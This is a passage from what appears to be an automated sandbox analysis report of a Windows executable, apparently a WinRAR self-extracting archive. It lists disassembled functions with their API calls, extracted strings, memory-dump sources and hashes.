                                                                                          • Opcode ID: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                                                                                          • Instruction ID: 26321abcf236def41b423f64ac150fbffc7c3e96c71cac4e35c80abede9e024d
                                                                                          • Opcode Fuzzy Hash: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                                                                                          • Instruction Fuzzy Hash: FEE17A72E0C7A68AF7209B25D4803AD7BA0FB45759F244235DA8D97796CF38E485E700
                                                                                          Function 00007FF6373A4F38 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 158COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocClearStringVariant
                                                                                          • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                          • API String ID: 1959693985-3505469590
                                                                                          • Opcode ID: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                                                          • Instruction ID: 525f06eaf867ccacd2b723f6b576dcdeb19ebcda284c022857656b84f0b91b7f
                                                                                          • Opcode Fuzzy Hash: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                                                          • Instruction Fuzzy Hash: 3E712976A19A0685FF60CF26E8805AD77B4FF98B98B445132EA4E83B64CF3CE544D700
                                                                                          Function 00007FF6373C72EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6373C74F3,?,?,?,00007FF6373C525E,?,?,?,00007FF6373C5219), ref: 00007FF6373C7371
                                                                                          • GetLastError.KERNEL32(?,?,00000000,00007FF6373C74F3,?,?,?,00007FF6373C525E,?,?,?,00007FF6373C5219), ref: 00007FF6373C737F
                                                                                          • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6373C74F3,?,?,?,00007FF6373C525E,?,?,?,00007FF6373C5219), ref: 00007FF6373C73A9
                                                                                          • FreeLibrary.KERNEL32(?,?,00000000,00007FF6373C74F3,?,?,?,00007FF6373C525E,?,?,?,00007FF6373C5219), ref: 00007FF6373C73EF
                                                                                          • GetProcAddress.KERNEL32(?,?,00000000,00007FF6373C74F3,?,?,?,00007FF6373C525E,?,?,?,00007FF6373C5219), ref: 00007FF6373C73FB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                          • String ID: api-ms-
                                                                                          • API String ID: 2559590344-2084034818
                                                                                          • Opcode ID: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                                                          • Instruction ID: f8c683d32cd6e5a8911187eec53cb2b201da4269557fa8c3636d9aae66918959
                                                                                          • Opcode Fuzzy Hash: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                                                          • Instruction Fuzzy Hash: 5A31C161F1E66391FE52AB16A8006B923A4FF48BA1F194639DD1DCB390DF3CE045A750
                                                                                          Function 00007FF6373C1604 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(?,?,?,00007FF6373C1573,?,?,?,00007FF6373C192A), ref: 00007FF6373C162B
                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF6373C1573,?,?,?,00007FF6373C192A), ref: 00007FF6373C1648
                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF6373C1573,?,?,?,00007FF6373C192A), ref: 00007FF6373C1664
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$HandleModule
                                                                                          • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                          • API String ID: 667068680-1718035505
                                                                                          • Opcode ID: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                                                          • Instruction ID: 9dca4c8913e31eb139c3c48e9018c5bc13cd73c64f337fdc5d62d50b5edb32c7
                                                                                          • Opcode Fuzzy Hash: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                                                          • Instruction Fuzzy Hash: 89112DA1F1EB1382FE658B01B9402B463D5AF08795F4C5435CC1DCA3A0EF3CB4A8B600
                                                                                          Function 00007FF6373AED24 Relevance: 9.1, APIs: 6, Instructions: 120timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6373A51A4: GetVersionExW.KERNEL32 ref: 00007FF6373A51D5
                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF637395AB4), ref: 00007FF6373AED8C
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF637395AB4), ref: 00007FF6373AED98
                                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF637395AB4), ref: 00007FF6373AEDA8
                                                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF637395AB4), ref: 00007FF6373AEDB6
                                                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF637395AB4), ref: 00007FF6373AEDC4
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF637395AB4), ref: 00007FF6373AEE05
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$File$System$Local$SpecificVersion
                                                                                          • String ID:
                                                                                          • API String ID: 2092733347-0
                                                                                          • Opcode ID: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                                          • Instruction ID: de97cb878501bb4d2dddc9799726a46aa5a6f2c042fcfec4b3d60d7c999e5910
                                                                                          • Opcode Fuzzy Hash: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                                          • Instruction Fuzzy Hash: F65168B2F086558AEB44CFA9D4415AC37B1FB48B88B60403ADE0D97B58EF38E556DB40
                                                                                          Function 00007FF6373AF010 Relevance: 9.1, APIs: 6, Instructions: 80timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$File$System$Local$SpecificVersion
                                                                                          • String ID:
                                                                                          • API String ID: 2092733347-0
                                                                                          • Opcode ID: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                                          • Instruction ID: 3d3998166facbed66ca23fe9cc1df877868048f6fb6e5a5c19cc543cd7547984
                                                                                          • Opcode Fuzzy Hash: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                                          • Instruction Fuzzy Hash: 7E312762B14A56CAFB00CFB5E8811AC3770FF08758B54502AEE0E97B68EF38D995D704
                                                                                          Function 00007FF6373A7918 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                          • String ID: .rar$exe$rar$sfx
                                                                                          • API String ID: 3668304517-630704357
                                                                                          • Opcode ID: 97aafd44a7caf21700e2098a6ceb5321661423453e734b1945fa1e7d2bcd8431
                                                                                          • Instruction ID: 3a7da3195ab90cbf919b604a1f3dd6e6192edafa4304ab4d9faa0de25a91aa6f
                                                                                          • Opcode Fuzzy Hash: 97aafd44a7caf21700e2098a6ceb5321661423453e734b1945fa1e7d2bcd8431
                                                                                          • Instruction Fuzzy Hash: 77A1BC62A1CA0680FF449B25D8862FC2361EF50BA8F401239DE5D877EADF3CE585E340
                                                                                          Function 00007FF6373C5CE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: abort$CallEncodePointerTranslator
                                                                                          • String ID: MOC$RCC
                                                                                          • API String ID: 2889003569-2084237596
                                                                                          • Opcode ID: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                                          • Instruction ID: 9458e718715a8fe6125ba78c667134e0f2ecc0ad3c0ca1afd71ecca750df117c
                                                                                          • Opcode Fuzzy Hash: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                                          • Instruction Fuzzy Hash: B891AF73E09BA2CAF710CB65E8402AD7BA0FB04789F204129EE4D97B59DF38D195DB00
                                                                                          Function 00007FF6373C4F80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                          • String ID: csm$f
                                                                                          • API String ID: 2395640692-629598281
                                                                                          • Opcode ID: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                                          • Instruction ID: 6b2ba1e7010e3f831ebc7d22a851360ef147ff4faac2488a48b0d26bdba36597
                                                                                          • Opcode Fuzzy Hash: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                                          • Instruction Fuzzy Hash: B751A032E1D6238AFB14DF15E848A693795FF40B8AF608034DA5AC7748EF79E841E740
                                                                                          Function 00007FF63739CEE0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 139COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                                                                                          • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                          • API String ID: 2102711378-639343689
                                                                                          • Opcode ID: 87299e3d8371150436d20a5d335114172b85ee8c064b133af49689baa0f6dc88
                                                                                          • Instruction ID: 8b0c9a44494bdf68b6c482e211b59119848e4da662f978e2850ac98b7c544007
                                                                                          • Opcode Fuzzy Hash: 87299e3d8371150436d20a5d335114172b85ee8c064b133af49689baa0f6dc88
                                                                                          • Instruction Fuzzy Hash: 1551CE62F1C74285FB10DB75D8526BD23A1AFA67E4F400135DE1DA37A6EE3CA485E300
                                                                                          Function 00007FF6373B7B28 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Show$Rect
                                                                                          • String ID: RarHtmlClassName
                                                                                          • API String ID: 2396740005-1658105358
                                                                                          • Opcode ID: 95333b9ad2bfddc98b100d65ee3ae7a1141886215ecc40d0d40dcbf9cb340d19
                                                                                          • Instruction ID: 0572c1dd1cd20d17de319d399e481b459e1a6809240be83f8a39bb40ba4364cc
                                                                                          • Opcode Fuzzy Hash: 95333b9ad2bfddc98b100d65ee3ae7a1141886215ecc40d0d40dcbf9cb340d19
                                                                                          • Instruction Fuzzy Hash: C0518422A0DB468AFB24DB25E45437AA7A1FF85B90F044439DE8E87B55DF3CF0459B00
                                                                                          Function 00007FF6373BFD0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                                                          • String ID: sfxcmd$sfxpar
                                                                                          • API String ID: 3540648995-3493335439
                                                                                          • Opcode ID: 48e58e823320ee2e30a8ba7f247afa82eb81b269a21fe23b9d6641b37ea74fe4
                                                                                          • Instruction ID: 6f0377f3c9d248a969af5ede233414abf1c637d77d52c0d781cff53ed1bc733a
                                                                                          • Opcode Fuzzy Hash: 48e58e823320ee2e30a8ba7f247afa82eb81b269a21fe23b9d6641b37ea74fe4
                                                                                          • Instruction Fuzzy Hash: 7A316972A18E1684FB00CBA9E8851AC3371FB88B98F541135DE5D97BA9DF38E082D344
                                                                                          Function 00007FF6373BFED4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                          • API String ID: 0-56093855
                                                                                          • Opcode ID: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                                          • Instruction ID: 4e93afa2875948878b9bcb6a6832e7241fd4387465743822a87a8c3253b9fa54
                                                                                          • Opcode Fuzzy Hash: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                                          • Instruction Fuzzy Hash: BF21E425A0EF4BC0FA108B99E8441B563E0EF49B88F94103AE98DC7360DE3CF595A340
                                                                                          Function 00007FF6373CBFB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 4061214504-1276376045
                                                                                          • Opcode ID: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                                          • Instruction ID: 4545d0a0844bba89bf434fa733cb450bcbab124d7cda608a5d6456f165e47740
                                                                                          • Opcode Fuzzy Hash: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                                          • Instruction Fuzzy Hash: E3F04961A2DA8281FE448B51E8842B963A0EF88B90F481035E94FC7765DF3CE488A704
                                                                                          Function 00007FF6373D45C0 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                                                          • Instruction ID: ecd476c03e14483e983dbd690258bf6aa45ac795000315ef7b0cde7824f80133
                                                                                          • Opcode Fuzzy Hash: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                                                          • Instruction Fuzzy Hash: 0E81FD62F2C65289FB209B6598806BDA7A0FF55B88F414135DE0ED3B95CF3CE455E308
                                                                                          Function 00007FF6373A3AF8 Relevance: 7.7, APIs: 5, Instructions: 164filetimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
